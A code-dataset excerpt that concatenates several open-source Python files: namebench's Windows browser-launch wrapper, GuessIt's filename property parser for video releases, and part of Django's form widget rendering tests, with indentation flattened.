parser.CharacterDataHandler = lambda data: target.send(('text', data))
parser.ParseFile(f)
if __name__ == "__main__":
import doctest
doctest.testmod()
| lgpl-2.1 |
perrytm/namebench | libnamebench/better_webbrowser.py | 175 | 4191 | #!/usr/bin/env python
# Copyright 2009 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Wrapper for webbrowser library, to invoke the http handler on win32."""
__author__ = 'tstromberg@google.com (Thomas Stromberg)'
import os.path
import subprocess
import sys
import traceback
import webbrowser
import util
def output(string):
    """Print *string* to stdout.

    Uses the print() call form, which behaves identically on Python 2
    (parenthesized expression) and is valid syntax on Python 3.
    """
    print(string)
def create_win32_http_cmd(url):
"""Create a command-line tuple to launch a web browser for a given URL.
Args:
url: string
Returns:
tuple of: (executable, arg1, arg2, ...)
At the moment, this ignores all default arguments to the browser.
TODO(tstromberg): Properly parse the command-line arguments.
"""
browser_type = None
try:
key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER,
'Software\Classes\http\shell\open\command')
browser_type = 'user'
except WindowsError:
key = _winreg.OpenKey(_winreg.HKEY_LOCAL_MACHINE,
'Software\Classes\http\shell\open\command')
browser_type = 'machine'
except:
return False
cmd = _winreg.EnumValue(key, 0)[1]
# "C:\blah blah\iexplore.exe" -nohome
# "C:\blah blah\firefox.exe" -requestPending -osint -url "%1"
if '"' in cmd:
executable = cmd.split('"')[1]
else:
executable = cmd.split(' ')[0]
if not os.path.exists(executable):
output('$ Default HTTP browser does not exist: %s' % executable)
return False
else:
output('$ %s HTTP handler: %s' % (browser_type, executable))
return (executable, url)
def open(url):
"""Opens a URL, overriding the normal webbrowser.open methods for sanity."""
try:
webbrowser.open(url, new=1, autoraise=True)
# If the user is missing the osascript binary - see
# http://code.google.com/p/namebench/issues/detail?id=88
except:
output('Failed to open: [%s]: %s' % (url, util.GetLastExceptionString()))
if os.path.exists('/usr/bin/open'):
try:
output('trying open: %s' % url)
p = subprocess.Popen(('open', url))
p.wait()
except:
output('open did not seem to work: %s' % util.GetLastExceptionString())
elif sys.platform[:3] == 'win':
try:
output('trying default Windows controller: %s' % url)
controller = webbrowser.get('windows-default')
controller.open_new(url)
except:
output('WindowsController did not work: %s' % util.GetLastExceptionString())
# *NOTE*: EVIL IMPORT SIDE EFFECTS AHEAD!
#
# If we are running on Windows, register the WindowsHttpDefault class.
if sys.platform[:3] == 'win':
import _winreg
# We don't want to load this class by default, because Python 2.4 doesn't have BaseBrowser.
class WindowsHttpDefault(webbrowser.BaseBrowser):
"""Provide an alternate open class for Windows user, using the http handler."""
def open(self, url, new=0, autoraise=1):
command_args = create_win32_http_cmd(url)
if not command_args:
output('$ Could not find HTTP handler')
return False
output('command_args:')
output(command_args)
# Avoid some unicode path issues by moving our current directory
old_pwd = os.getcwd()
os.chdir('C:\\')
try:
_unused = subprocess.Popen(command_args)
os.chdir(old_pwd)
return True
except:
traceback.print_exc()
output('$ Failed to run HTTP handler, trying next browser.')
os.chdir(old_pwd)
return False
webbrowser.register('windows-http', WindowsHttpDefault, update_tryorder=-1)
| apache-2.0 |
Elandril/SickRage | lib/guessit/transfo/guess_properties.py | 28 | 16821 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# GuessIt - A library for guessing information from filenames
# Copyright (c) 2013 Rémi Alvergnat <toilal.dev@gmail.com>
#
# GuessIt is free software; you can redistribute it and/or modify it under
# the terms of the Lesser GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# GuessIt is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# Lesser GNU General Public License for more details.
#
# You should have received a copy of the Lesser GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import absolute_import, division, print_function, unicode_literals
import re
from guessit.containers import PropertiesContainer, WeakValidator, LeavesValidator, QualitiesContainer, ChainedValidator, DefaultValidator, OnlyOneValidator, LeftValidator, NeighborValidator, FullMatchValidator
from guessit.patterns import sep, build_or_pattern
from guessit.patterns.extension import subtitle_exts, video_exts, info_exts
from guessit.patterns.numeral import numeral, parse_numeral
from guessit.plugins.transformers import Transformer
from guessit.matcher import GuessFinder, found_property
class GuessProperties(Transformer):
def __init__(self):
Transformer.__init__(self, 35)
self.container = PropertiesContainer()
self.qualities = QualitiesContainer()
def register_property(propname, props, **kwargs):
"""props a dict of {value: [patterns]}"""
for canonical_form, patterns in props.items():
if isinstance(patterns, tuple):
patterns2, pattern_kwarg = patterns
if kwargs:
current_kwarg = dict(kwargs)
current_kwarg.update(pattern_kwarg)
else:
current_kwarg = dict(pattern_kwarg)
current_kwarg['canonical_form'] = canonical_form
self.container.register_property(propname, *patterns2, **current_kwarg)
elif kwargs:
current_kwarg = dict(kwargs)
current_kwarg['canonical_form'] = canonical_form
self.container.register_property(propname, *patterns, **current_kwarg)
else:
self.container.register_property(propname, *patterns, canonical_form=canonical_form)
def register_quality(propname, quality_dict):
"""props a dict of {canonical_form: quality}"""
for canonical_form, quality in quality_dict.items():
self.qualities.register_quality(propname, canonical_form, quality)
# http://en.wikipedia.org/wiki/Pirated_movie_release_types
register_property('format', {'VHS': ['VHS', 'VHS-Rip'],
'Cam': ['CAM', 'CAMRip', 'HD-CAM'],
#'Telesync': ['TELESYNC', 'PDVD'],
'Telesync': (['TS', 'HD-TS'], {'confidence': 0.4}),
'Workprint': ['WORKPRINT', 'WP'],
'Telecine': ['TELECINE', 'TC'],
'PPV': ['PPV', 'PPV-Rip'], # Pay Per View
'TV': ['SD-TV', 'SD-TV-Rip', 'Rip-SD-TV', 'TV-Rip', 'Rip-TV'],
'DVB': ['DVB-Rip', 'DVB', 'PD-TV'],
'DVD': ['DVD', 'DVD-Rip', 'VIDEO-TS', 'DVD-R', 'DVD-9', 'DVD-5'],
'HDTV': ['HD-TV', 'TV-RIP-HD', 'HD-TV-RIP', 'HD-RIP'],
'VOD': ['VOD', 'VOD-Rip'],
'WEBRip': ['WEB-Rip'],
'WEB-DL': ['WEB-DL', 'WEB-HD', 'WEB'],
'HD-DVD': ['HD-DVD-Rip', 'HD-DVD'],
'BluRay': ['Blu-ray(?:-Rip)?', 'B[DR]', 'B[DR]-Rip', 'BD[59]', 'BD25', 'BD50']
})
register_quality('format', {'VHS': -100,
'Cam': -90,
'Telesync': -80,
'Workprint': -70,
'Telecine': -60,
'PPV': -50,
'TV': -30,
'DVB': -20,
'DVD': 0,
'HDTV': 20,
'VOD': 40,
'WEBRip': 50,
'WEB-DL': 60,
'HD-DVD': 80,
'BluRay': 100
})
register_property('screenSize', {'360p': ['(?:\d{3,}(?:\\|\/|x|\*))?360(?:i|p?x?)'],
'368p': ['(?:\d{3,}(?:\\|\/|x|\*))?368(?:i|p?x?)'],
'480p': ['(?:\d{3,}(?:\\|\/|x|\*))?480(?:i|p?x?)'],
#'480p': (['hr'], {'confidence': 0.2}), # duplicate dict key
'576p': ['(?:\d{3,}(?:\\|\/|x|\*))?576(?:i|p?x?)'],
'720p': ['(?:\d{3,}(?:\\|\/|x|\*))?720(?:i|p?x?)'],
'900p': ['(?:\d{3,}(?:\\|\/|x|\*))?900(?:i|p?x?)'],
'1080i': ['(?:\d{3,}(?:\\|\/|x|\*))?1080i'],
'1080p': ['(?:\d{3,}(?:\\|\/|x|\*))?1080p?x?'],
'4K': ['(?:\d{3,}(?:\\|\/|x|\*))?2160(?:i|p?x?)']
},
validator=ChainedValidator(DefaultValidator(), OnlyOneValidator()))
_digits_re = re.compile(r'\d+')

def resolution_formatter(value):
    """Normalize a matched resolution string to its digit runs joined by 'x'.

    e.g. '1280*720' -> '1280x720', '640-x-480' -> '640x480'.
    """
    return 'x'.join(_digits_re.findall(value))
# Free-form 'WIDTHxHEIGHT' resolutions (e.g. '1280x720'); the raw match is
# normalized by resolution_formatter instead of being used as-is.
self.container.register_property('screenSize', '\d{3,4}-?[x\*]-?\d{3,4}', canonical_from_pattern=False, formatter=resolution_formatter)
# Relative ranking of the named resolutions (higher = better).
register_quality('screenSize', {'360p': -300,
'368p': -200,
'480p': -100,
'576p': 0,
'720p': 100,
'900p': 130,
'1080i': 180,
'1080p': 200,
'4K': 400
})
_videoCodecProperty = {'Real': ['Rv\d{2}'], # http://en.wikipedia.org/wiki/RealVideo
'Mpeg2': ['Mpeg2'],
'DivX': ['DVDivX', 'DivX'],
'XviD': ['XviD'],
'h264': ['[hx]-264(?:-AVC)?', 'MPEG-4(?:-AVC)'],
'h265': ['[hx]-265(?:-HEVC)?', 'HEVC']
}
register_property('videoCodec', _videoCodecProperty)
register_quality('videoCodec', {'Real': -50,
'Mpeg2': -30,
'DivX': -10,
'XviD': 0,
'h264': 100,
'h265': 150
})
# http://blog.mediacoderhq.com/h264-profiles-and-levels/
# http://fr.wikipedia.org/wiki/H.264
# Video profiles are only accepted next to a detected codec: the
# LeavesValidator lambdas require 'videoCodec' in the same node's guess.
self.container.register_property('videoProfile', 'BP', validator=LeavesValidator(lambdas=[lambda node: 'videoCodec' in node.guess]))
self.container.register_property('videoProfile', 'XP', 'EP', canonical_form='XP', validator=LeavesValidator(lambdas=[lambda node: 'videoCodec' in node.guess]))
self.container.register_property('videoProfile', 'MP', validator=LeavesValidator(lambdas=[lambda node: 'videoCodec' in node.guess]))
self.container.register_property('videoProfile', 'HP', 'HiP', canonical_form='HP', validator=LeavesValidator(lambdas=[lambda node: 'videoCodec' in node.guess]))
self.container.register_property('videoProfile', '10.?bit', 'Hi10P', canonical_form='10bit')
self.container.register_property('videoProfile', '8.?bit', canonical_form='8bit')
self.container.register_property('videoProfile', 'Hi422P', validator=LeavesValidator(lambdas=[lambda node: 'videoCodec' in node.guess]))
self.container.register_property('videoProfile', 'Hi444PP', validator=LeavesValidator(lambdas=[lambda node: 'videoCodec' in node.guess]))
register_quality('videoProfile', {'BP': -20,
'XP': -10,
'MP': 0,
'HP': 10,
'10bit': 15,
'Hi422P': 25,
'Hi444PP': 35
})
# has nothing to do here (or on filenames for that matter), but some
# releases use it and it helps to identify release groups, so we adapt
register_property('videoApi', {'DXVA': ['DXVA']})
register_property('audioCodec', {'MP3': ['MP3', 'LAME', 'LAME(?:\d)+-(?:\d)+'],
'DolbyDigital': ['DD'],
'AAC': ['AAC'],
'AC3': ['AC3'],
'Flac': ['FLAC'],
'DTS': (['DTS'], {'validator': LeftValidator()}),
'TrueHD': ['True-HD']
})
register_quality('audioCodec', {'MP3': 10,
'DolbyDigital': 30,
'AAC': 35,
'AC3': 40,
'Flac': 45,
'DTS': 60,
'TrueHD': 70
})
# Audio profiles are tied to a specific codec via the validator lambdas
# (HD/HD-MA -> DTS, HE/LC -> AAC, HQ -> AC3).
self.container.register_property('audioProfile', 'HD', validator=LeavesValidator(lambdas=[lambda node: node.guess.get('audioCodec') == 'DTS']))
self.container.register_property('audioProfile', 'HD-MA', canonical_form='HDMA', validator=LeavesValidator(lambdas=[lambda node: node.guess.get('audioCodec') == 'DTS']))
self.container.register_property('audioProfile', 'HE', validator=LeavesValidator(lambdas=[lambda node: node.guess.get('audioCodec') == 'AAC']))
self.container.register_property('audioProfile', 'LC', validator=LeavesValidator(lambdas=[lambda node: node.guess.get('audioCodec') == 'AAC']))
self.container.register_property('audioProfile', 'HQ', validator=LeavesValidator(lambdas=[lambda node: node.guess.get('audioCodec') == 'AC3']))
register_quality('audioProfile', {'HD': 20,
'HDMA': 50,
'LC': 0,
'HQ': 0,
'HE': 20
})
register_property('audioChannels', {'7.1': ['7[\W_]1', '7ch', '8ch'],
'5.1': ['5[\W_]1', '5ch', '6ch'],
'2.0': ['2[\W_]0', '2ch', 'stereo'],
'1.0': ['1[\W_]0', '1ch', 'mono']
})
register_quality('audioChannels', {'7.1': 200,
'5.1': 100,
'2.0': 0,
'1.0': -100
})
self.container.register_property('episodeFormat', r'Minisodes?', canonical_form='Minisode')
# 8 hex digits, e.g. a CRC32 checksum embedded in the filename.
self.container.register_property('crc32', '(?:[a-fA-F]|[0-9]){8}', enhance=False, canonical_from_pattern=False)
# Generic part number: 'pt'/'part' followed by a numeral, captured as
# <part> and converted to an int by parse_numeral.
part_words = ['pt', 'part']
self.container.register_property(None, '(' + build_or_pattern(part_words) + sep + '?(?P<part>' + numeral + '))[^0-9]', enhance=False, canonical_from_pattern=False, confidence=0.4, formatter=parse_numeral)
register_property('other', {'AudioFix': ['Audio-Fix', 'Audio-Fixed'],
'SyncFix': ['Sync-Fix', 'Sync-Fixed'],
'DualAudio': ['Dual-Audio'],
'WideScreen': ['ws', 'wide-screen'],
'Netflix': ['Netflix', 'NF']
})
self.container.register_property('other', 'Real', 'Fix', canonical_form='Proper', validator=ChainedValidator(FullMatchValidator(), NeighborValidator()))
self.container.register_property('other', 'Proper', 'Repack', 'Rerip', canonical_form='Proper')
self.container.register_property('other', 'Fansub', canonical_form='Fansub', validator=ChainedValidator(FullMatchValidator(), NeighborValidator()))
self.container.register_property('other', 'Fastsub', canonical_form='Fastsub', validator=ChainedValidator(FullMatchValidator(), NeighborValidator()))
self.container.register_property('other', '(?:Seasons?' + sep + '?)?Complete', canonical_form='Complete')
self.container.register_property('other', 'R5', 'RC', canonical_form='R5')
self.container.register_property('other', 'Pre-Air', 'Preair', canonical_form='Preair')
self.container.register_property('other', 'CC') # Close Caption
self.container.register_property('other', 'LD', 'MD') # Line/Mic Dubbed
self.container.register_canonical_properties('other', 'Screener', 'Remux', '3D', 'HD', 'mHD', 'HDLight', 'HQ',
'DDC',
'HR', 'PAL', 'SECAM', 'NTSC')
self.container.register_canonical_properties('other', 'Limited', 'Complete', 'Classic', 'Unrated', 'LiNE', 'Bonus', 'Trailer', validator=WeakValidator())
# Derive '<format> Screener' patterns (e.g. 'DVD-Scr') from every
# registered format pattern.
for prop in self.container.get_properties('format'):
self.container.register_property('other', prop.pattern + '(-?Scr(?:eener)?)', canonical_form='Screener')
# Register every known subtitle/info/video file extension as a low
# confidence 'container' match.
for exts in (subtitle_exts, info_exts, video_exts):
for container in exts:
self.container.register_property('container', container, confidence=0.3)
# Find all registered property matches in *string* and merge them into a
# single Guess.  When a 'part' number is found and other guesses in the
# same group also carry 'part', the part numbers are merged into a shared,
# sorted 'partList', and the confidence of the higher part number is zeroed
# so only one 'part' value wins.
# NOTE(review): indentation in this chunk is flattened by the dump; the
# nesting of the statements below is inferred — confirm against upstream.
def guess_properties(self, string, node=None, options=None):
found = self.container.find_properties(string, node, options)
guess = self.container.as_guess(found, string)
if guess and node:
if 'part' in guess:
# If two guesses in the same group both carry 'part', merge them
# into a shared 'partList'.
for existing_guess in node.group_node().guesses:
if 'part' in existing_guess:
if 'partList' not in existing_guess:
existing_guess['partList'] = [existing_guess['part']]
existing_guess['partList'].append(guess['part'])
existing_guess['partList'].sort()
# Keep confidence only on the guess with the smaller part number.
if existing_guess['part'] > guess['part']:
existing_guess.set_confidence('part', 0)
else:
guess.set_confidence('part', 0)
guess['partList'] = list(existing_guess['partList'])
return guess
def supported_properties(self):
    """Return every property name this transformer may emit.

    All names known to the patterns container, plus the synthesized
    'partList' property built by guess_properties.
    """
    return list(self.container.get_supported_properties()) + ['partList']
def process(self, mtree, options=None):
    """Run property detection over the unidentified leaves of *mtree*.

    Afterwards, count the leaves whose 'other' property contains 'Proper'
    and, if any were found, record the count as 'properCount' on the tree.
    """
    finder = GuessFinder(self.guess_properties, 1.0, self.log, options)
    finder.process_nodes(mtree.unidentified_leaves())
    proper_count = sum(
        1 for leaf in mtree.leaves_containing('other')
        if 'other' in leaf.info and 'Proper' in leaf.info['other'])
    if proper_count:
        found_property(mtree, 'properCount', proper_count)
# Delegate quality rating to the qualities registry (self.qualities) so
# callers can rank competing guesses for the properties registered above.
def rate_quality(self, guess, *props):
return self.qualities.rate_quality(guess, *props)
| gpl-3.0 |
oinopion/django | tests/forms_tests/tests/test_widgets.py | 29 | 105047 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import copy
import datetime
from django.contrib.admin.tests import AdminSeleniumWebDriverTestCase
from django.core.files.uploadedfile import SimpleUploadedFile
from django.core.urlresolvers import reverse
from django.forms import (
BooleanField, CharField, CheckboxInput, CheckboxSelectMultiple,
ChoiceField, ClearableFileInput, DateField, DateInput, DateTimeInput,
FileInput, Form, HiddenInput, MultipleChoiceField, MultipleHiddenInput,
MultiValueField, MultiWidget, NullBooleanSelect, PasswordInput,
RadioSelect, Select, SelectDateWidget, SelectMultiple, SplitDateTimeField,
SplitDateTimeWidget, Textarea, TextInput, TimeInput, ValidationError,
)
from django.forms.widgets import (
ChoiceFieldRenderer, ChoiceInput, RadioFieldRenderer,
)
from django.test import SimpleTestCase, override_settings
from django.utils import six, translation
from django.utils.dates import MONTHS_AP
from django.utils.encoding import force_text, python_2_unicode_compatible
from django.utils.safestring import SafeData, mark_safe
from ..models import Article
class FormsWidgetTests(SimpleTestCase):
# Each Widget class corresponds to an HTML form widget. A Widget knows how to
# render itself, given a field name and some data. Widgets don't perform
# validation.
def test_textinput(self):
    """TextInput rendering: value handling, HTML escaping, attrs precedence."""
    widget = TextInput()
    # Empty string and None both render without a value attribute.
    self.assertHTMLEqual(widget.render('email', ''), '<input type="text" name="email" />')
    self.assertHTMLEqual(widget.render('email', None), '<input type="text" name="email" />')
    self.assertHTMLEqual(widget.render('email', 'test@example.com'), '<input type="text" name="email" value="test@example.com" />')
    self.assertHTMLEqual(widget.render('email', 'some "quoted" & ampersanded value'), '<input type="text" name="email" value="some &quot;quoted&quot; &amp; ampersanded value" />')
    self.assertHTMLEqual(widget.render('email', 'test@example.com', attrs={'class': 'fun'}), '<input type="text" name="email" value="test@example.com" class="fun" />')
    self.assertHTMLEqual(widget.render('email', 'ŠĐĆŽćžšđ', attrs={'class': 'fun'}), '<input type="text" name="email" value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" class="fun" />')
    # attrs given to the constructor are baked into every render:
    widget = TextInput(attrs={'class': 'fun', 'type': 'email'})
    self.assertHTMLEqual(widget.render('email', ''), '<input type="email" class="fun" name="email" />')
    self.assertHTMLEqual(widget.render('email', 'foo@example.com'), '<input type="email" class="fun" value="foo@example.com" name="email" />')
    # ...but attrs given to render() win over constructor attrs:
    widget = TextInput(attrs={'class': 'pretty'})
    self.assertHTMLEqual(widget.render('email', '', attrs={'class': 'special'}), '<input type="text" class="special" name="email" />')
    # attrs values can be safe-strings if needed
    widget = TextInput(attrs={'onBlur': mark_safe("function('foo')")})
    self.assertHTMLEqual(widget.render('email', ''), '<input onBlur="function(\'foo\')" type="text" name="email" />')
# PasswordInput rendering: by default the value is never echoed back
# (render_value is off); with render_value=True it behaves like TextInput,
# including escaping and constructor/render() attrs precedence.
def test_passwordinput(self):
w = PasswordInput()
self.assertHTMLEqual(w.render('email', ''), '<input type="password" name="email" />')
self.assertHTMLEqual(w.render('email', None), '<input type="password" name="email" />')
self.assertHTMLEqual(w.render('email', 'secret'), '<input type="password" name="email" />')
# The render_value argument lets you specify whether the widget should render
# its value. For security reasons, this is off by default.
w = PasswordInput(render_value=True)
self.assertHTMLEqual(w.render('email', ''), '<input type="password" name="email" />')
self.assertHTMLEqual(w.render('email', None), '<input type="password" name="email" />')
self.assertHTMLEqual(w.render('email', 'test@example.com'), '<input type="password" name="email" value="test@example.com" />')
self.assertHTMLEqual(w.render('email', 'some "quoted" & ampersanded value'), '<input type="password" name="email" value="some &quot;quoted&quot; &amp; ampersanded value" />')
self.assertHTMLEqual(w.render('email', 'test@example.com', attrs={'class': 'fun'}), '<input type="password" name="email" value="test@example.com" class="fun" />')
# You can also pass 'attrs' to the constructor:
w = PasswordInput(attrs={'class': 'fun'}, render_value=True)
self.assertHTMLEqual(w.render('email', ''), '<input type="password" class="fun" name="email" />')
self.assertHTMLEqual(w.render('email', 'foo@example.com'), '<input type="password" class="fun" value="foo@example.com" name="email" />')
# 'attrs' passed to render() get precedence over those passed to the constructor:
w = PasswordInput(attrs={'class': 'pretty'}, render_value=True)
self.assertHTMLEqual(w.render('email', '', attrs={'class': 'special'}), '<input type="password" class="special" name="email" />')
self.assertHTMLEqual(w.render('email', 'ŠĐĆŽćžšđ', attrs={'class': 'fun'}), '<input type="password" class="fun" value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" name="email" />')
def test_hiddeninput(self):
    """HiddenInput rendering: value handling, constructor/render() attrs
    precedence, and stringification of booleans.

    Fix: an exact duplicate of the attrs-precedence block (same comment,
    same widget, same assertion) was removed.
    """
    w = HiddenInput()
    self.assertHTMLEqual(w.render('email', ''), '<input type="hidden" name="email" />')
    self.assertHTMLEqual(w.render('email', None), '<input type="hidden" name="email" />')
    self.assertHTMLEqual(w.render('email', 'test@example.com'), '<input type="hidden" name="email" value="test@example.com" />')
    self.assertHTMLEqual(w.render('email', 'some "quoted" & ampersanded value'), '<input type="hidden" name="email" value="some &quot;quoted&quot; &amp; ampersanded value" />')
    self.assertHTMLEqual(w.render('email', 'test@example.com', attrs={'class': 'fun'}), '<input type="hidden" name="email" value="test@example.com" class="fun" />')
    # You can also pass 'attrs' to the constructor:
    w = HiddenInput(attrs={'class': 'fun'})
    self.assertHTMLEqual(w.render('email', ''), '<input type="hidden" class="fun" name="email" />')
    self.assertHTMLEqual(w.render('email', 'foo@example.com'), '<input type="hidden" class="fun" value="foo@example.com" name="email" />')
    # 'attrs' passed to render() get precedence over those passed to the constructor:
    w = HiddenInput(attrs={'class': 'pretty'})
    self.assertHTMLEqual(w.render('email', '', attrs={'class': 'special'}), '<input type="hidden" class="special" name="email" />')
    self.assertHTMLEqual(w.render('email', 'ŠĐĆŽćžšđ', attrs={'class': 'fun'}), '<input type="hidden" class="fun" value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" name="email" />')
    # Boolean values are rendered to their string forms ("True" and "False").
    w = HiddenInput()
    self.assertHTMLEqual(w.render('get_spam', False), '<input type="hidden" name="get_spam" value="False" />')
    self.assertHTMLEqual(w.render('get_spam', True), '<input type="hidden" name="get_spam" value="True" />')
def test_multiplehiddeninput(self):
    """MultipleHiddenInput rendering: one hidden input per value, attrs
    precedence, and per-input id suffixing.

    Fix: an exact duplicate of the attrs-precedence block (same comment,
    same widget, same assertion) was removed.
    """
    w = MultipleHiddenInput()
    self.assertHTMLEqual(w.render('email', []), '')
    self.assertHTMLEqual(w.render('email', None), '')
    self.assertHTMLEqual(w.render('email', ['test@example.com']), '<input type="hidden" name="email" value="test@example.com" />')
    self.assertHTMLEqual(w.render('email', ['some "quoted" & ampersanded value']), '<input type="hidden" name="email" value="some &quot;quoted&quot; &amp; ampersanded value" />')
    self.assertHTMLEqual(w.render('email', ['test@example.com', 'foo@example.com']), '<input type="hidden" name="email" value="test@example.com" />\n<input type="hidden" name="email" value="foo@example.com" />')
    self.assertHTMLEqual(w.render('email', ['test@example.com'], attrs={'class': 'fun'}), '<input type="hidden" name="email" value="test@example.com" class="fun" />')
    self.assertHTMLEqual(w.render('email', ['test@example.com', 'foo@example.com'], attrs={'class': 'fun'}), '<input type="hidden" name="email" value="test@example.com" class="fun" />\n<input type="hidden" name="email" value="foo@example.com" class="fun" />')
    # You can also pass 'attrs' to the constructor:
    w = MultipleHiddenInput(attrs={'class': 'fun'})
    self.assertHTMLEqual(w.render('email', []), '')
    self.assertHTMLEqual(w.render('email', ['foo@example.com']), '<input type="hidden" class="fun" value="foo@example.com" name="email" />')
    self.assertHTMLEqual(w.render('email', ['foo@example.com', 'test@example.com']), '<input type="hidden" class="fun" value="foo@example.com" name="email" />\n<input type="hidden" class="fun" value="test@example.com" name="email" />')
    # 'attrs' passed to render() get precedence over those passed to the constructor:
    w = MultipleHiddenInput(attrs={'class': 'pretty'})
    self.assertHTMLEqual(w.render('email', ['foo@example.com'], attrs={'class': 'special'}), '<input type="hidden" class="special" value="foo@example.com" name="email" />')
    self.assertHTMLEqual(w.render('email', ['ŠĐĆŽćžšđ'], attrs={'class': 'fun'}), '<input type="hidden" class="fun" value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" name="email" />')
    # Each input gets a separate ID.
    w = MultipleHiddenInput()
    self.assertHTMLEqual(w.render('letters', list('abc'), attrs={'id': 'hideme'}), '<input type="hidden" name="letters" value="a" id="hideme_0" />\n<input type="hidden" name="letters" value="b" id="hideme_1" />\n<input type="hidden" name="letters" value="c" id="hideme_2" />')
def test_fileinput(self):
    """FileInput never re-renders a previous value: a stale filename is of
    no use when re-displaying the form, so only a bare file input is emitted."""
    widget = FileInput()
    for stale_value in ('', None, 'test@example.com', 'some "quoted" & ampersanded value'):
        self.assertHTMLEqual(widget.render('email', stale_value), '<input type="file" name="email" />')
    self.assertHTMLEqual(widget.render('email', 'test@example.com', attrs={'class': 'fun'}), '<input type="file" name="email" class="fun" />')
    # Constructor attrs are rendered; the value is still ignored:
    widget = FileInput(attrs={'class': 'fun'})
    self.assertHTMLEqual(widget.render('email', ''), '<input type="file" class="fun" name="email" />')
    self.assertHTMLEqual(widget.render('email', 'foo@example.com'), '<input type="file" class="fun" name="email" />')
    self.assertHTMLEqual(widget.render('email', 'ŠĐĆŽćžšđ', attrs={'class': 'fun'}), '<input type="file" class="fun" name="email" />')
# Textarea rendering: default rows/cols, content escaping (safe strings are
# not re-escaped), and constructor/render() attrs precedence.
def test_textarea(self):
w = Textarea()
self.assertHTMLEqual(w.render('msg', ''), '<textarea rows="10" cols="40" name="msg"></textarea>')
self.assertHTMLEqual(w.render('msg', None), '<textarea rows="10" cols="40" name="msg"></textarea>')
self.assertHTMLEqual(w.render('msg', 'value'), '<textarea rows="10" cols="40" name="msg">value</textarea>')
self.assertHTMLEqual(w.render('msg', 'some "quoted" & ampersanded value'), '<textarea rows="10" cols="40" name="msg">some &quot;quoted&quot; &amp; ampersanded value</textarea>')
self.assertHTMLEqual(w.render('msg', mark_safe('pre &quot;quoted&quot; value')), '<textarea rows="10" cols="40" name="msg">pre &quot;quoted&quot; value</textarea>')
self.assertHTMLEqual(w.render('msg', 'value', attrs={'class': 'pretty', 'rows': 20}), '<textarea class="pretty" rows="20" cols="40" name="msg">value</textarea>')
# You can also pass 'attrs' to the constructor:
w = Textarea(attrs={'class': 'pretty'})
self.assertHTMLEqual(w.render('msg', ''), '<textarea rows="10" cols="40" name="msg" class="pretty"></textarea>')
self.assertHTMLEqual(w.render('msg', 'example'), '<textarea rows="10" cols="40" name="msg" class="pretty">example</textarea>')
# 'attrs' passed to render() get precedence over those passed to the constructor:
w = Textarea(attrs={'class': 'pretty'})
self.assertHTMLEqual(w.render('msg', '', attrs={'class': 'special'}), '<textarea rows="10" cols="40" name="msg" class="special"></textarea>')
self.assertHTMLEqual(w.render('msg', 'ŠĐĆŽćžšđ', attrs={'class': 'fun'}), '<textarea rows="10" cols="40" name="msg" class="fun">\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111</textarea>')
# CheckboxInput rendering and value extraction: truthiness decides the
# checked attribute, non-boolean values also set 'value', a custom
# check_test callable can override the decision, and value_from_datadict
# treats mere key presence as True.
def test_checkboxinput(self):
w = CheckboxInput()
self.assertHTMLEqual(w.render('is_cool', ''), '<input type="checkbox" name="is_cool" />')
self.assertHTMLEqual(w.render('is_cool', None), '<input type="checkbox" name="is_cool" />')
self.assertHTMLEqual(w.render('is_cool', False), '<input type="checkbox" name="is_cool" />')
self.assertHTMLEqual(w.render('is_cool', True), '<input checked="checked" type="checkbox" name="is_cool" />')
# Using any value that's not in ('', None, False, True) will check the checkbox
# and set the 'value' attribute.
self.assertHTMLEqual(w.render('is_cool', 'foo'), '<input checked="checked" type="checkbox" name="is_cool" value="foo" />')
self.assertHTMLEqual(w.render('is_cool', False, attrs={'class': 'pretty'}), '<input type="checkbox" name="is_cool" class="pretty" />')
# regression for #17114
self.assertHTMLEqual(w.render('is_cool', 0), '<input checked="checked" type="checkbox" name="is_cool" value="0" />')
self.assertHTMLEqual(w.render('is_cool', 1), '<input checked="checked" type="checkbox" name="is_cool" value="1" />')
# You can also pass 'attrs' to the constructor:
w = CheckboxInput(attrs={'class': 'pretty'})
self.assertHTMLEqual(w.render('is_cool', ''), '<input type="checkbox" class="pretty" name="is_cool" />')
# 'attrs' passed to render() get precedence over those passed to the constructor:
w = CheckboxInput(attrs={'class': 'pretty'})
self.assertHTMLEqual(w.render('is_cool', '', attrs={'class': 'special'}), '<input type="checkbox" class="special" name="is_cool" />')
# You can pass 'check_test' to the constructor. This is a callable that takes the
# value and returns True if the box should be checked.
w = CheckboxInput(check_test=lambda value: value.startswith('hello'))
self.assertHTMLEqual(w.render('greeting', ''), '<input type="checkbox" name="greeting" />')
self.assertHTMLEqual(w.render('greeting', 'hello'), '<input checked="checked" type="checkbox" name="greeting" value="hello" />')
self.assertHTMLEqual(w.render('greeting', 'hello there'), '<input checked="checked" type="checkbox" name="greeting" value="hello there" />')
self.assertHTMLEqual(w.render('greeting', 'hello & goodbye'), '<input checked="checked" type="checkbox" name="greeting" value="hello &amp; goodbye" />')
# Ticket #17888: calling check_test shouldn't swallow exceptions
with self.assertRaises(AttributeError):
w.render('greeting', True)
# The CheckboxInput widget will return False if the key is not found in the data
# dictionary (because HTML form submission doesn't send any result for unchecked
# checkboxes).
self.assertFalse(w.value_from_datadict({}, {}, 'testing'))
# Any present value — even '0' — coerces to True.
value = w.value_from_datadict({'testing': '0'}, {}, 'testing')
self.assertIsInstance(value, bool)
